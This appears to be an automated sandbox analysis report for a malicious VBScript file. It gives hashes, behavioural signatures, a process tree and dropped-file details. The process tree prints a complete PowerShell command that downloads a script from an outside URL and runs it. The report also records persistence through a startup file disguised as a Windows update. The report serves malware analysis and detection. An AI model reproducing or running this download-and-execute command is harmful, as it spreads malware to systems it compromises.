Analysis
-
max time kernel
144s -
max time network
153s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
26-08-2021 12:19
Static task
static1
Behavioral task
behavioral1
Sample
NUF77882993883JJS01.vbs
Resource
win7v20210408
General
-
Target
NUF77882993883JJS01.vbs
-
Size
15KB
-
MD5
6adbdc4f8416b3002c17f67f6fc68471
-
SHA1
23b7fbbe29a977a9b6f0b7739daa81901b5c5508
-
SHA256
8f47c6601f5a5bdaa0a35ae18b93451bbfc674219adb8e896e25085f326dd32f
-
SHA512
d2caa17b0ff821a1e30d038c33c8c3bfd6aff49061e758697f47b2e063b276f25b8daa4916d4b653fefaa78632a8e6a29f43a42d4e244a795e1945647a5fad17
Malware Config
Extracted
http://sylvaniaindianrestaurant.com.au/wp-includes/FR7501.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 8 908 powershell.exe 13 2908 powershell.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows10DecemberUpdate.vbs powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 908 powershell.exe 908 powershell.exe 908 powershell.exe 2908 powershell.exe 2908 powershell.exe 2908 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 908 powershell.exe Token: SeDebugPrivilege 2908 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 3728 wrote to memory of 908 3728 WScript.exe powershell.exe PID 3728 wrote to memory of 908 3728 WScript.exe powershell.exe PID 908 wrote to memory of 2908 908 powershell.exe powershell.exe PID 908 wrote to memory of 2908 908 powershell.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NUF77882993883JJS01.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebClient]$WEB=New-Object System.Net.WebClient;$WEB.DownloadFile('http://sylvaniaindianrestaurant.com.au/wp-includes/FR7501.txt','C:\Users\Public\FR7501.PS1');PowerShell -File C:\Users\Public\FR7501.PS12⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File C:\Users\Public\FR7501.PS13⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\FR7501.PS1MD5
5480fceef4e5290938cb0a23955358df
SHA1891c237730a39b36bd443e485d3493f5f7ff68c5
SHA256d9cfdea62d4a3acc5ec47cfc0349002af129add61611a0810b73394bc7ea3020
SHA5123cf3bef1f0d02ba68d5656e842a58b001aa4ba7b67ab1e21d93b8f2efa604283c58224bd8f8a208b09ab14e1443f78e4da7dbbbd1f1edfaa60316ae1056be392
-
memory/908-114-0x0000000000000000-mapping.dmp
-
memory/908-119-0x00000160C3760000-0x00000160C3761000-memory.dmpFilesize
4KB
-
memory/908-122-0x00000160DBDC0000-0x00000160DBDC1000-memory.dmpFilesize
4KB
-
memory/908-125-0x00000160DBBB0000-0x00000160DBBB2000-memory.dmpFilesize
8KB
-
memory/908-127-0x00000160DBBB3000-0x00000160DBBB5000-memory.dmpFilesize
8KB
-
memory/908-134-0x00000160DBBB6000-0x00000160DBBB8000-memory.dmpFilesize
8KB
-
memory/2908-129-0x0000000000000000-mapping.dmp
-
memory/2908-135-0x0000025ABA5C0000-0x0000025ABA5C2000-memory.dmpFilesize
8KB
-
memory/2908-136-0x0000025ABA5C3000-0x0000025ABA5C5000-memory.dmpFilesize
8KB
-
memory/2908-178-0x0000025ABA5C6000-0x0000025ABA5C8000-memory.dmpFilesize
8KB